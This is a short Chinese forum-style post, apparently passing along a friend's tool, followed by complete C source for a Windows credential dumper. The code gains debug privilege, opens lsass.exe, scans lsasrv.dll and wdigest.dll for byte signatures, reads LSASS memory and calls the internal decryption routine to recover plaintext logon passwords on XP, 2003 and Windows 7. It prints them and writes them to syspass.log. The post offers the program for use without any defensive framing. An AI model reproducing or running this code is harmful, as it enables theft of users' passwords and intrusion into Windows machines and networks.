从一好朋友那得到一个好东西
可以读取系统明文
请用vc++ 6.0编译
#include <windows.h> #include <stdio.h> // // Vsbat[0x710dddd] // // Note: VC++ 6.0编译/Admin权限执行 // #define MEM_SIZE 0x1000 #define WIN7 0x1 #define WINXP 0x2 #define WIN03 0x4 typedef struct _LSA_UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } LSA_UNICODE_STRING , *PLSA_UNICODE_STRING ; typedef struct _SECURITY_LOGON_SESSION_DATA { ULONG Size; LUID LogonId; LSA_UNICODE_STRING UserName; LSA_UNICODE_STRING LogonDomain; LSA_UNICODE_STRING AuthenticationPackage; ULONG LogonType; ULONG Session; PSID Sid; LARGE_INTEGER LogonTime; LSA_UNICODE_STRING LogonServer; LSA_UNICODE_STRING DnsDomainName; LSA_UNICODE_STRING Upn; } SECURITY_LOGON_SESSION_DATA, *PSECURITY_LOGON_SESSION_DATA ; typedef int (__stdcall * pNTQUERYPROCESSINFORMATION)(HANDLE, DWORD, PVOID, ULONG, PULONG) ; typedef int (__stdcall * pLSAENUMERATELOGONSESSIONS)(PULONG, PLUID *) ; typedef int (__stdcall * pDECRIPTFUNC)(PBYTE, DWORD) ; typedef int (__stdcall * pLSAFREERETURNBUFFER)(PVOID) ; typedef int (__stdcall * pLSAGETLOGONSESSIONDATA)(PLUID, PSECURITY_LOGON_SESSION_DATA *) ; int EnableDebugPrivilege() ; void printHexBytes(PBYTE data, int nBytes) ; PBYTE search_bytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize) ; void CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind) ; HANDLE GetProcessHandleByName(const CHAR *szName) ; LPVOID GetEncryptListHead() ; void printSessionInfo(pLSAGETLOGONSESSIONDATA, pLSAFREERETURNBUFFER, PLUID) ; // 解密函数特征码(lsasrv.text) BYTE DecryptfuncSign[] = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x6A, 0x00, 0xFF, 0x75, 0x0C, 0xFF, 0x75, 0x08, 0xE8 } ; // 密钥KEY相关的关键地址特征码(lsasrv.text) BYTE DecryptKeySign_WIN7[] = { 0x33, 0xD2, 0xC7, 0x45, 0xE8, 0x08, 0x00, 0x00, 0x00, 0x89, 0x55, 0xE4 } ; BYTE DecryptKeySign_XP[] = { 0x8D, 0x85, 0xF0, 0xFE, 0xFF, 0xFF, 0x50, 0xFF, 0x75, 0x10, 0xFF, 0x35 } ; // 密文关键指针特征码(wdigest.text) BYTE KeyPointerSign[] = { 0x8B, 0x45, 0x08, 0x89, 0x08, 0xC7, 0x40, 0x04 } ; // 全局变量 BYTE MemBuf[MEM_SIZE], SecBuf[0x200], ThirdBuf[0x200] ; BYTE Encryptdata[0x100] ; HANDLE GetProcessHandleByName(const CHAR *szName) { // // GetProcessHandle获得lsass.exe进程句柄 // DWORD dwProcessId , ReturnLength, nBytes ; WCHAR Buffer[MAX_PATH + 0x20] ; HANDLE hProcess ; PWCHAR pRetStr ; pNTQUERYPROCESSINFORMATION NtQueryInformationProcess ; CHAR szCurrentPath[MAX_PATH] ; NtQueryInformationProcess = (pNTQUERYPROCESSINFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtQueryInformationProcess") ; // Process ID 一定是 4 的倍数 for(dwProcessId = 4 ; dwProcessId < 10*1000 ; dwProcessId += 4) { hProcess = OpenProcess(PROCESS_ALL_ACCESS , FALSE, dwProcessId) ; if(hProcess != NULL) { if(!NtQueryInformationProcess(hProcess, 27, Buffer, sizeof(Buffer), &ReturnLength)) { pRetStr = (PWCHAR)(*(DWORD *)((DWORD)Buffer + 4)) ; nBytes = WideCharToMultiByte(CP_ACP, 0, pRetStr, -1, szCurrentPath, MAX_PATH, NULL, NULL) ; if(nBytes) { PCHAR pCurName = &szCurrentPath[nBytes-1] ; while(pCurName >= szCurrentPath) { if(*pCurName == '\') break ; pCurName -- ; } pCurName ++ ; if(lstrcmpi(szName, pCurName) == 0) { return hProcess ; } } } // 关闭打开的句柄 CloseHandle(hProcess) ; } } return NULL ; } LPVOID GetEncryptListHead() { // // 根据KeyPointerSign[]获得密文存储的关键相关地址 // HINSTANCE hMod ; LPVOID pEndAddr, KeyPointer, pTemp ; hMod = LoadLibrary("wdigest.dll") ; pEndAddr = GetProcAddress(hMod, "SpInstanceInit") ; pTemp = hMod ; KeyPointer = NULL ; while(pTemp < pEndAddr && pTemp != NULL) { KeyPointer = pTemp ; pTemp = (LPVOID)search_bytes((PBYTE)pTemp + sizeof(KeyPointerSign), (PBYTE)pEndAddr, KeyPointerSign, sizeof(KeyPointerSign)) ; } KeyPointer = (LPVOID)(*(DWORD *)((DWORD)KeyPointer - 4)) ; FreeLibrary(hMod) ; return KeyPointer ; } void k8writeTxt(char* logtext) { //写入txt FILE* pFile = NULL; pFile = fopen( "syspass.log", "a+" ); // 12345/n5678/n 用sizeof 结果竟然只得到 1234 //fwrite( ptext2, sizeof(ptext2), 1, pFile ); fwrite( logtext, strlen(logtext), 1, pFile ); fclose( pFile ); //关闭时会写入结束符 } int main() { HINSTANCE hModlsasrv ; DWORD LogonSessionCount, i ,dwBytesRead ; PLUID LogonSessionList, pCurLUID , pListLUID ; BYTE EncryptBuf[0x200] ; HANDLE hProcess ; if(EnableDebugPrivilege() != 1) puts("EnableDebugPrivilege fail !") ; hProcess = GetProcessHandleByName("lsass.exe") ; if(hProcess == NULL) { puts("GetProcessHandleByName fail !") ; puts("Try To Run As Administrator ...") ; system("echo Press any Key to Continue ... & pause > nul") ; return 0 ; } OSVERSIONINFO VersionInformation ; DWORD dwVerOff = 0 , osKind = -1 ; // 版本判断 memset(&VersionInformation, 0, sizeof(VersionInformation)); VersionInformation.dwOSVersionInfoSize = sizeof(VersionInformation) ; GetVersionEx(&VersionInformation) ; if (VersionInformation.dwMajorVersion == 5) { if ( VersionInformation.dwMinorVersion == 1 ) { dwVerOff = 36 ; osKind = WINXP ; } else if (VersionInformation.dwMinorVersion == 2) { dwVerOff = 28 ; osKind = WIN03 ; } } else if (VersionInformation.dwMajorVersion == 6) { dwVerOff = 32 ; osKind = WIN7 ; } if(osKind == -1) { printf("[Undefined OS version] Major: %d Minor: %d ", VersionInformation.dwMajorVersion, VersionInformation.dwMinorVersion) ; system("echo Press any Key to Continue ... & pause > nul") ; CloseHandle(hProcess) ; return 0 ; } // 获得解密函数地址 pDECRIPTFUNC DecryptFunc ; hModlsasrv = LoadLibrary("lsasrv.dll") ; DecryptFunc = (pDECRIPTFUNC)search_bytes((PBYTE)hModlsasrv, (PBYTE)0x7fffdddd, DecryptfuncSign, sizeof(DecryptfuncSign)) ; // 获得密文链表头地址 LPVOID ListHead ; ListHead = GetEncryptListHead() ; // 获得全局数据(lsasrv.data及解密KEY相关的数据) CopyKeyGlobalData(hProcess, hModlsasrv, osKind) ; HINSTANCE hModSecur32 ; pLSAENUMERATELOGONSESSIONS LsaEnumerateLogonSessions ; pLSAGETLOGONSESSIONDATA LsaGetLogonSessionData ; pLSAFREERETURNBUFFER LsaFreeReturnBuffer ; hModSecur32 = LoadLibrary("Secur32.dll") ; LsaEnumerateLogonSessions = (pLSAENUMERATELOGONSESSIONS)GetProcAddress(hModSecur32, "LsaEnumerateLogonSessions") ; LsaGetLogonSessionData = (pLSAGETLOGONSESSIONDATA)GetProcAddress(hModSecur32, "LsaGetLogonSessionData") ; LsaFreeReturnBuffer = (pLSAFREERETURNBUFFER)GetProcAddress(hModSecur32, "LsaFreeReturnBuffer") ; LsaEnumerateLogonSessions(&LogonSessionCount, &LogonSessionList) ; for(i = 0 ; i < LogonSessionCount ; i++) { pCurLUID = (PLUID)((DWORD)LogonSessionList + sizeof(LUID) * i) ; // 打印相关信息 printSessionInfo(LsaGetLogonSessionData, LsaFreeReturnBuffer, pCurLUID) ; // 遍历链式结构查找当前的LUID ReadProcessMemory(hProcess, ListHead, EncryptBuf, 0x100, &dwBytesRead) ; while(*(DWORD *)EncryptBuf != (DWORD)ListHead) { ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)EncryptBuf), EncryptBuf, 0x100, &dwBytesRead) ; pListLUID = (LUID *)((DWORD)EncryptBuf + 0x10) ; if((pListLUID->LowPart == pCurLUID->LowPart) && (pListLUID->HighPart == pCurLUID->HighPart)) { break ; } } if(*(DWORD *)EncryptBuf == (DWORD)ListHead) { puts("Specific LUID NOT found ") ; continue ; } DWORD pFinal = 0 ; DWORD nBytes = 0 ; LPVOID pEncrypt ; pFinal = (DWORD)(pListLUID) + dwVerOff ; nBytes = *(WORD *)((DWORD)pFinal + 2) ; // 密文大小 pEncrypt = (LPVOID)(*(DWORD *)((DWORD)pFinal + 4)) ; // 密文地址(Remote) memset(Encryptdata, 0, sizeof(Encryptdata)) ; ReadProcessMemory(hProcess, (LPVOID)pEncrypt, Encryptdata, nBytes, &dwBytesRead) ; // 调用解密函数解密 DecryptFunc(Encryptdata, nBytes) ; // 打印密码明文 printf("password: %S ", Encryptdata) ; k8writeTxt((char*)Encryptdata);//保存日志 } CloseHandle(hProcess) ; LsaFreeReturnBuffer(LogonSessionList) ; FreeLibrary(hModlsasrv) ; FreeLibrary(hModSecur32) ; if(osKind == WIN7) { FreeLibrary(GetModuleHandle("bcrypt.dll")) ; FreeLibrary(GetModuleHandle("bcryptprimitives.dll")) ; } system("echo Press any Key to EXIT ... & pause > nul") ; return 0 ; } void printSessionInfo(pLSAGETLOGONSESSIONDATA LsaGetLogonSessionData, pLSAFREERETURNBUFFER LsaFreeReturnBuffer, PLUID pCurLUID) { PSECURITY_LOGON_SESSION_DATA pLogonSessionData ; LsaGetLogonSessionData(pCurLUID, &pLogonSessionData) ; printf("UserName: %S ", pLogonSessionData->UserName.Buffer) ; printf("LogonDomain: %S ", pLogonSessionData->LogonDomain.Buffer) ; LsaFreeReturnBuffer(pLogonSessionData) ; } int EnableDebugPrivilege() { HANDLE hToken ; LUID sedebugnameValue ; TOKEN_PRIVILEGES tkp ; if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) ) { puts("OpenProcessToken fail") ; return 0 ; } if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue)) { puts("LookupPrivilegeValue fail") ; return 0 ; } tkp.PrivilegeCount = 1 ; tkp.Privileges[0].Luid = sedebugnameValue ; tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED ; if(!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL) ) { puts("AdjustTokenPrivileges fail") ; return 0 ; } return 1 ; } PBYTE search_bytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize) { // // 在pBegin与pEnd之间搜索pBytes地址处的指定字节序列,字节个数为nsize // DWORD count ; PBYTE pDst ; while((DWORD)pBegin + (DWORD)nsize <= (DWORD)pEnd) { pDst = pBytes ; count = 0 ; while(count < nsize && *pBegin == *pDst) { pBegin ++ ; pDst ++ ; count ++ ; } if(count == nsize) break ; pBegin = pBegin - count + 1 ; } if(count == nsize) { return (PBYTE)((DWORD)pBegin - (DWORD)count) ; } else { return NULL ; } } void CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind) { PIMAGE_SECTION_HEADER pSectionHead ; PIMAGE_DOS_HEADER pDosHead ; PIMAGE_NT_HEADERS pPEHead ; DWORD dwBytes, dwBytesRead ; LPVOID pdataAddr, pDecryptKey , DecryptKey, pEndAddr ; pDosHead = (PIMAGE_DOS_HEADER)hModlsasrv ; pSectionHead = (PIMAGE_SECTION_HEADER)(pDosHead->e_lfanew + (DWORD)hModlsasrv + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER)) ; pdataAddr = (LPVOID)((DWORD)pSectionHead->VirtualAddress + (DWORD)hModlsasrv) ; dwBytes = ((DWORD)(pSectionHead->Misc.VirtualSize) / 0x1000 + 1) * 0x1000 ; ReadProcessMemory(hProcess, pdataAddr, pdataAddr, dwBytes, &dwBytesRead) ; pPEHead = (PIMAGE_NT_HEADERS)(pDosHead->e_lfanew + (DWORD)hModlsasrv) ; pEndAddr = (LPVOID)(pPEHead->OptionalHeader.SizeOfImage + (DWORD)hModlsasrv) ; switch(osKind) { case WINXP : case WIN03 : { pDecryptKey = (LPVOID)search_bytes((PBYTE)(hModlsasrv), (PBYTE)pEndAddr , DecryptKeySign_XP, sizeof(DecryptKeySign_XP)) ; pDecryptKey = (LPVOID)*(DWORD *)((DWORD)pDecryptKey + sizeof(DecryptKeySign_XP)) ; ReadProcessMemory(hProcess, (LPVOID)pDecryptKey, &DecryptKey, 4, &dwBytesRead) ; // DecryptKey 是与解密相关的关键地址 ReadProcessMemory(hProcess, (LPVOID)DecryptKey, MemBuf, 0x200, &dwBytesRead) ; pdataAddr = (LPVOID)pDecryptKey ; *(DWORD *)pdataAddr = (DWORD)MemBuf ; break ; } case WIN7 : { // WIN7 需调用这两个DLL中的函数进行解密 LoadLibrary("bcrypt.dll") ; LoadLibrary("bcryptprimitives.dll") ; pDecryptKey = (LPVOID)search_bytes((PBYTE)(hModlsasrv), (PBYTE)pEndAddr , DecryptKeySign_WIN7, sizeof(DecryptKeySign_WIN7)) ; pDecryptKey = (LPVOID)(*(DWORD *)((DWORD)pDecryptKey - 4)) ; // DecryptKey 是与解密相关的关键地址 ReadProcessMemory(hProcess, pDecryptKey, &DecryptKey, 0x4, &dwBytesRead) ; ReadProcessMemory(hProcess, (LPVOID)DecryptKey, MemBuf, 0x200, &dwBytesRead) ; pdataAddr = (LPVOID)pDecryptKey ; *(DWORD *)pdataAddr = (DWORD)MemBuf ; ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)((DWORD)MemBuf + 8)), SecBuf, 0x200, &dwBytesRead) ; pdataAddr = (LPVOID)((DWORD)MemBuf + 8) ; *(DWORD *)pdataAddr = (DWORD)SecBuf ; ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)((DWORD)MemBuf + 0xC)), ThirdBuf, 0x200, &dwBytesRead) ; pdataAddr = (LPVOID)((DWORD)MemBuf + 0xC) ; *(DWORD *)pdataAddr = (DWORD)ThirdBuf ; break ; } } return ; }